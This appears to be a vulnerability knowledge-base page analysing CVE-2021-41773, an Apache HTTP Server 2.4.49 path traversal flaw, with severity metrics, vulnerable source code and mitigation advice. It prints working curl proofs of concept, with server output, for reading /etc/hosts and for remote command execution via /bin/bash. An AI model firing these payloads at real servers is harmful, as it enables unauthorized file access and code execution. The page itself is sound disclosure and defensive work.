Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
10

CVE-2021-41773

Disclosure Date: October 05, 2021
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Initial Access
Techniques
Validation
Validated

Description

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied”, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

Add Assessment

CVSS V3 Severity and Metrics
Base Score:
7.5 High
Impact Score:
3.6
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • Apache Software Foundation

Products

  • Apache HTTP Server

Exploited in the Wild

Reported by:

References

Advisory

Additional Info

Technical Analysis

Threat status: Threat
Attacker utility: Info leak, remote code execution

Description

On October 4, 2021, Apache HTTP Server version 2.4.50 was released with a patch for CVE-2021-41773, an unauthenticated and remote file disclosure vulnerability. The vulnerability arises from the mishandling of URL-encoded path traversal characters in the HTTP GET request. An attacker can read files outside of the server root directory by sending a specially crafted request.

Public exploits are available and the vendor reports the vulnerability has reportedly been exploited in the wild. For more information, see Apache’s advisory here.

Affected products

  • Apache HTTP Server version 2.4.49
  • Apache HTTP Server version 2.4.50

Rapid7 analysis

The vulnerable code is in server/util.c within the ap_normalize_path function. This function attempts to resolve URL-encoded values and remove path traversal logic from the requested URI. The vulnerability is the result of resolving Unicode values one at a time and attempting to detect traversal logic before all characters have been decoded.

The following is a snippet of the vulnerable code in server/util.c lines 561 – 596

if (path[l] == '.') {
    /* Remove /./ segments */
    if (IS_SLASH_OR_NUL(path[l + 1])) {
        l++;
        if (path[l]) {
            l++;
        }
        continue;
    }

    /* Remove /xx/../ segments */
    if (path[l + 1] == '.' && IS_SLASH_OR_NUL(path[l + 2])) {
        /* Wind w back to remove the previous segment */
        if (w > 1) {
            do {
                w--;
            } while (w && !IS_SLASH(path[w - 1]));
        }
        else {
            /* Already at root, ignore and return a failure
             * if asked to.
             */
            if (flags & AP_NORMALIZE_NOT_ABOVE_ROOT) {
                ret = 0;
            }
        }

        /* Move l forward to the next segment */
        l += 2;
        if (path[l]) {
            l++;
        }
        continue;
    }
}

When an attacker uses /.%2e/ in a URI, the logic on line 572 will not recognize %2e as a period because the character has not yet been decoded. Normally, to fix such an issue, the developers would decode the entire URI at once and then scan for path traversal logic. Rapid7 analysts note that Apache did not take this approach.

A simple curl proof of concept follows:

albinolobster@ubuntu:~$ curl -v --path-as-is http://127.0.0.1/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/hosts
*   Trying 127.0.0.1:80...
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/hosts HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Tue, 05 Oct 2021 16:54:39 GMT
< Server: Apache/2.4.49 (Unix)
< Last-Modified: Mon, 04 Oct 2021 19:00:13 GMT
< ETag: "dd-5cd8b85df5c38"
< Accept-Ranges: bytes
< Content-Length: 221
<
127.0.0.1    localhost
127.0.1.1    ubuntu

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
* Connection #0 to host 127.0.0.1 left intact

The vulnerable code was introduced in a 2020 commit, but only made its way into one official release. The HTTP server is only affected when the configuration file is either missing the directory directive for the entire filesystem (e.g. <Directory />) or the filesystem directory directive contains Require all granted. Note that the default configuration of HTTP Server contains a filesystem directory directive containing Require all denied, and is therefore not vulnerable.

Rapid7 researchers examined default Apache configurations packaged with some popular Linux distributions, but none appear to be vulnerable by default. There may be some third-party products using vulnerable configurations, but since the vulnerability is limited to one version of HTTP server, we don’t expect exploitation to be widespread.

Updates

October 5, 2021: On the evening of October 5, 2021 @hackerfantastic posted a proof of concept demonstrating remote code execution using this vulnerability. Remote code execution is possible only when mod_cgi is enabled. Again, mod_cgi is not enabled in the default Apache Server HTTP configuration, but it isn’t an uncommon feature to enable either.

When mod_cgi is enabled, an attacker can execute arbitrary programs via HTTP POST requests. While the initial RCE proof of concept resulted in blind command execution, there have been multiple proofs of concept that coerce the HTTP server into sending the program’s output back to the attacker. We believe the simplest method uses echo -e “\n$(commands) in the POST body:

albinolobster@ubuntu:~$ curl -v -d 'echo -e "\n$(id)"' http://127.0.0.1/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/bash
*   Trying 127.0.0.1:80...
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 17 out of 17 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Wed, 06 Oct 2021 10:16:13 GMT
< Server: Apache/2.4.49 (Unix)
< Transfer-Encoding: chunked
<
uid=1(daemon) gid=1(daemon) groups=1(daemon)
* Connection #0 to host 127.0.0.1 left intact

Useful exploitation is more difficult on Windows as it’s less conducive to one liners like Unix-like systems. However, Will Dormann did post a tweet that demonstrated popping calc.exe using this vulnerability.

October 7, 2021: On October 7, Apache updated their advisory to note that the patch for CVE-2021-41773 was incomplete, rendering HTTP Server 2.4.50 versions vulnerable when specific, non-default conditions are met. According to their advisory, “an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.”

CVE-2021-42013 has been assigned to track the incomplete fix for CVE-2021-41773. CVE-2021-42013 has been fixed in HTTP Server version 2.4.51 released October 7, 2021. For more information, see Apache’s advisory.

This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.

Guidance

Organizations should determine if they are using Apache HTTP Server 2.4.49 or 2.4.50 and if they are using vulnerable configurations. If a vulnerable server is discovered, the server’s configuration file should be updated to include the filesystem directory directive with require all denied:

<Directory />
    Require all denied
</Directory>

If possible, upgrade to HTTP Server 2.4.51 or later as soon as possible. For more information, see Apache’s advisory here.